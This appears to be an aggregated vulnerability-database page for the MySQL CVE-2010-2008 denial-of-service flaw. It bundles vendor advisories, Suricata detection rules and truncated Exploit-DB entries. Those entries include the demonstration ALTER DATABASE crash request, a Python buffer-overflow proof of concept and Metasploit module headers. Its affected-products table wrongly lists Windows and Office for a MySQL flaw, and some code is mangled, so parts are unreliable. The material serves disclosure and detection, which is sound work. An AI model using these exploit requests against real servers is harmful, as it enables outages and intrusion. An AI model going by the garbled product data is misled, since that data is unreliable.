CVE-2010-2008
published 2010-07-13
Priority P4 · 24 · low · 3.5 CVSS 2.0
AV:N/AC:M/Au:S/C:N/I:N/A:P
EXPLOIT
EPSS: 9.01% (94.6th percentile)
MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| fedoraproject | fedora | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_word_viewer | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1511 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1703 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
| msrc | windows_server_2012_r2 | — | — |
| msrc | windows_server_2016 | — | — |
| oracle | mysql | < 5.1.48 | 5.1.48 |
CVSS provenance
nvd · v2.0 · 3.5 LOW · AV:N/AC:M/Au:S/C:N/I:N/A:P
vendor_redhat · 5.5 MEDIUM
vendor_msrc · 4.4 MEDIUM
vendor_ubuntu · 3.5 LOW
Microsoft
Windows Uniscribe Information Disclosure Vulnerability
vendor_msrc·2017-06-13·CVSS 4.4
CVE-2017-0285 [MEDIUM] Windows Uniscribe Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.
The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.
FAQ: I am running Office 2010, which is listed as affected software. Why am I not being offered the update?
The update, 3191848 (Ogl.dll), is not applicable to Office 2010 on Windows Server 2008 a
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2012-03-12
CVE-2007-5925 MySQL vulnerabilities
Title: MySQL vulnerabilities
Summary: Several security issues were fixed in MySQL.
Multiple security issues were discovered in MySQL and this update includes
new upstream MySQL versions to fix these issues.
MySQL has been updated to 5.1.61 in Ubuntu 10.04 LTS, Ubuntu 10.10,
Ubuntu 11.04 and Ubuntu 11.10. Ubuntu 8.04 LTS has been updated to
MySQL 5.0.95.
In addition to security fixes, the updated packages contain bug fixes, new
features, and possibly incompatible changes.
Please see the following for more information:
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html
http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html
http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
Instructions: In general, a standard system update will make all the necessary changes.
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2010-11-11·CVSS 3.5
CVE-2010-2008 [LOW] MySQL vulnerabilities
Title: MySQL vulnerabilities
It was discovered that MySQL incorrectly handled certain requests with the
UPGRADE DATA DIRECTORY NAME command. An authenticated user could exploit
this to make MySQL crash, causing a denial of service. This issue only
affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-2008)
It was discovered that MySQL incorrectly handled joins involving a table
with a unique SET column. An authenticated user could exploit this to make
MySQL crash, causing a denial of service. This issue only affected Ubuntu
6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3677)
It was discovered that MySQL incorrectly handled NULL arguments to IN() or
CASE operations. An authenticated user could exploit this to make MySQL
crash, causing a denial of service. This issue only affected Ubuntu 9.10
Red Hat
kernel: Xen Dom0 crash with Windows 2008 R2 64bit DomU + GPLPV
vendor_redhat·2010-09-20·CVSS 5.5
CVE-2010-4238 [MEDIUM] kernel: Xen Dom0 crash with Windows 2008 R2 64bit DomU + GPLPV
The vbd_create function in Xen 3.1.2, when the Linux kernel 2.6.18 on Red Hat Enterprise Linux (RHEL) 5 is used, allows guest OS users to cause a denial of service (host OS panic) via an attempted access to a virtual CD-ROM device through the blkback driver. NOTE: some of these details are obtained from third party information.
Red Hat
mysql: remote authenticated DoS via ALTER DATABASE
vendor_redhat·2010-07-06·CVSS 3.5
CVE-2010-2008 [LOW] mysql: remote authenticated DoS via ALTER DATABASE
MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
Package: mysql (Red Hat Enterprise Linux 6) - Not affected
Red Hat
eclipse: Help Content web application vulnerable to multiple XSS flaws
vendor_redhat·2008-04-24·CVSS 4.3
CVE-2008-7271 [MEDIUM] CWE-79 eclipse: Help Content web application vulnerable to multiple XSS flaws
Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.
Package: eclipse (Red Hat Enterprise Linux 5) - Will not fix
Package: eclipse (Red Hat Enterprise Linux 6) - Not affected
GHSA
GHSA-x8g4-4q7f-5fwx: MySQL before 5
ghsa_unreviewed·2022-05-13
CVE-2010-2008 [LOW] CWE-77 GHSA-x8g4-4q7f-5fwx: MySQL before 5
MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)
Rule: alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008694; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)"; flow:established,to_server; content:"|0B|"; offset:2; depth:1; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008701; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"/../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008713; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET WEB_SPECIFIC_APPS Experts answer.php question_id parameter SQL Injection
suricata·2010-07-30
CVE-2008-5267 ET WEB_SPECIFIC_APPS Experts answer.php question_id parameter SQL Injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Experts answer.php question_id parameter SQL Injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/answer.php?"; nocase; content:"question_id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,2008-5267; reference:url,milw0rm.com/exploits/5776; reference:bugtraq,29642; classtype:web-application-attack; sid:2008931; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, cve CVE_2008_5267, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2024_03_06, mitre_tactic_id TA0001, mitre_tacti
Suricata
ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion
suricata·2010-07-30·CVSS 10.0
CVE-2008-5063 [CRITICAL] ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/ADM_Pagina.php?"; nocase; content:"Tipo="; nocase; pcre:"/Tipo=\s*(?:https?|ftps?|php)\:\//i"; reference:cve,CVE-2008-5063; reference:url,vupen.com/english/advisories/2008/3093; reference:url,secunia.com/advisories/32645; classtype:web-application-attack; sid:2009395; rev:7; metadata:created_at 2010_07_30, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Expl
Suricata
ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion
suricata·2010-07-30·CVSS 9.3
CVE-2008-2898 [CRITICAL] ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/includes/footer.php?"; nocase; content:"c_temp_path"; nocase; pcre:"/c_temp_path=\s*(https?|ftps?|php)\:\//i"; reference:cve,CVE-2008-2898; reference:url,secunia.com/advisories/30778/; reference:url,milw0rm.com/exploits/8028; classtype:web-application-attack; sid:2009232; rev:8; metadata:created_at 2010_07_30, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_tec
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)"; flow:established,to_server; content:"|00 2e 00 2e 00 2f 00 2e 00 2e 00 2f 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 87|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008721; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008704; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt
suricata·2010-07-30
CVE-2008-1947 ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt"; flow:established,to_server; http.uri; content:"/host-manager/html/add"; nocase; content:"method="; nocase; pcre:"/(script|img|src|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/i"; reference:url,www.securityfocus.com/bid/29502/info; reference:cve,2008-1947; classtype:web-application-attack; sid:2010146; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, cve CVE_2008_1947, deployment Datacenter, confidence Medium, signature_severity Major, tag XSS, tag Cross_Site_Scripting, updated_at 2020_09_1
Suricata
ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2008-0785 [HIGH] ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id INSERT"; flow:established,to_server; http.uri; content:"tree.php?"; nocase; content:"leaf_id="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2008-0785; reference:bugtraq,27749; classtype:web-application-attack; sid:2007895; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_
Suricata
ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion
suricata·2010-07-30·CVSS 6.8
CVE-2008-6265 [MEDIUM] ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/portfolio/css.php?"; fast_pattern; nocase; content:"theme="; nocase; http.uri.raw; url_decode; content:"|2e 2e 2f|"; reference:cve,CVE-2008-6265; reference:url,milw0rm.com/exploits/7065; reference:url,vupen.com/english/advisories/2008/3070; reference:bugtraq,32218; classtype:web-application-attack; sid:2009764; rev:9; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2010_07_30, deployment Perimeter, deployment Internal, deployment Datacenter, confidence High, signat
Suricata
ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion
suricata·2010-07-30·CVSS 9.3
CVE-2008-2898 [CRITICAL] ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/includes/header.php?"; nocase; content:"c_temp_path"; nocase; pcre:"/c_temp_path=\s*(https?|ftps?|php)\:\//i"; reference:cve,CVE-2008-2898; reference:url,secunia.com/advisories/30778/; reference:url,milw0rm.com/exploits/5904; classtype:web-application-attack; sid:2009233; rev:8; metadata:created_at 2010_07_30, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_tec
Suricata
ET WEB_SPECIFIC_APPS Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt
suricata·2010-07-30
CVE-2008-2165 ET WEB_SPECIFIC_APPS Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; flow:established,to_server; http.uri; content:"/ekgnkm/AccessCodeStart.asp"; nocase; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/i"; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; classtype:attempted-user; sid:2010506; rev:7; metadata:created_at 2010_07_30, cve CVE_2008_2165, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_10;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)
Rule: alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008698; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008702; rev:6; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET SCADA CitectSCADA ODBC Overflow Attempt
suricata·2010-07-30
CVE-2008-2639 ET SCADA CitectSCADA ODBC Overflow Attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 20222 (msg:"ET SCADA CitectSCADA ODBC Overflow Attempt"; flow:established,to_server; dsize:4; byte_test:4,>,399,0; reference:cve,2008-2639; reference:url,www.digitalbond.com/index.php/2008/09/08/ids-signature-for-citect-vuln/; reference:url,digitalbond.com/tools/quickdraw/vulnerability-rules; classtype:attempted-user; sid:2008542; rev:8; metadata:created_at 2010_07_30, cve CVE_2008_2639, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
exploitdb·2010-10-27
CVE-2008-5751 Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
---
AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities
Name AlstraSoft E-Friends
Vendor http://www.alstrasoft.com
Versions Affected 4.96
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-10-27
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
AlstraSoft E-Friends is an online social networking
software that allows you to start your own site just like
Friendster and MySpace.
Other versions could be vulnerable.
II. DESCRIPTION
Many parameters are not properly sanitised before being
used in SQL queries and from the PHP's upload functions.
III. ANALYSIS
Summary:
A) Arbitrary
Exploit-DB
Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)
exploitdb·2010-09-25
CVE-2008-1898 Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)
---
##
# $Id: msworks_wkspictureinterface.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit',
'Description' => %q{
The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker
to execute arbitrary code on a system. By passing a negative integer to the
WksPictureInterface method, an attacker could execute arbitrary code on the system
with privil
Exploit-DB
Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2008-3878 Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow (Metasploit)
---
##
# $Id: ultraoffice_httpupload.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Ultra Shareware's Office
Control. When processing the 'HttpUpload' method, the arguments are concatenated
together to form a command line to run a bundled version of cURL. If the command
fails to run
Exploit-DB
VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2008-5492 VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)
---
##
# $Id: verypdf_pdfview.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow',
'Description' => %q{
The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow
because it fails to properly bounds-check user-supplied data before copying
it into an insufficiently sized memory buffer. An attacker can exploit this issue
to execute arbitrary code within the context of the affected ap
Exploit-DB
Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)
exploitdb·2010-09-20
CVE-2008-4844 Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)
---
##
# $Id: ms08_078_xml_corruption.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
# :ua_minver => "7.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :vuln_test => nil, # no way to test without just trying it
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Data Binding Memory Corruption',
'Description' => %q{
This module
Exploit-DB
Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service
exploitdb·2010-08-03
CVE-2010-2008 Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service
---
A vulnerability was reported in MySQL. A remote authenticated user can cause denial of service conditions.
This issue affects versions prior to MySQL 5.1.48.
A remote authenticated user can send a specially crafted ALTER DATABASE command to cause the target server to move a data directory into a new subdirectory, causing the data directory to become unusable.
A demonstration exploit request is provided [where "" is "." or ".." or is a sequence that begins with "./" or "../"]:
ALTER DATABASE `#mysql50#` UPGRADE DATA DIRECTORY NAME
Vendor advisory at:
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.html
Exploit-DB
BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)
exploitdb·2010-07-08
CVE-2008-4008 BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)
---
##
# $Id: bea_weblogic_transfer_encoding.rb 9744 2010-07-08 23:34:50Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin. This vulnerability exists in the
error reporti
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
exploitdb·2010-07-03
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
---
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Serv
Exploit-DB
File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)
exploitdb·2010-06-15
CVE-2010-2330 File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)
---
#!/usr/bin/python
# http://www.sharing-file.net/
# File Sharing Wizard Version 1.5.0 build on 26-8-2008
#
# controlling EAX
# ESP points to our buffer
# buffer grows if we increase our string
#
# more details on http://www.s3cur1ty.de
# have fun m1k3 [at] m1k3 [dot] at
import socket
import sys
if len(sys.argv) "
sys.exit(1)
ips = sys.argv[1]
port = int(sys.argv[2])
string = "A"*51
string += "B"*4 #controlling eax
string += "C"*500
header = "Content-Length"
print "starting the attack for:", ips
print ""
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "no connection possible"
sys.exit(1)
print "\r\nsending payload"
print "..."
payload = (
'GET http://%s/ HTTP/1.0\r\n'
'%s: %
Exploit-DB
Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2008-1724 Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: tumbleweed_filetransfer.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the vcst_eu.dll
FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed
SecureTransport suite. By sending an overly long string to the
TransferFile() 'remotefile' function, a
Exploit-DB
Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)
exploitdb·2010-06-11
CVE-2008-0550 Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)
---
##
# $Id: steamcast_useragent.rb 9488 2010-06-11 16:12:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Streamcast %q{
This module exploits a stack buffer overflow in Streamcast [
'LSO ', # Original exploit module
'patrick' # Added references and check code. Default target to XP.
],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9488 $',
'References' =>
[
[ 'CVE', '2008-0550' ],
[ 'OSVDB', '42670' ],
[ 'URL', 'http://aluigi.altervista.org/adv/steamcazz-adv.
Exploit-DB
FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)
exploitdb·2010-05-27·CVSS 9.3
CVE-2010-1938 [CRITICAL] FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)
---
# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
# CVE-2010-1938
# FreeBSD-SA-10:05
# Credit: Maksymilian Arciemowicz and Adam Zabrocki
#
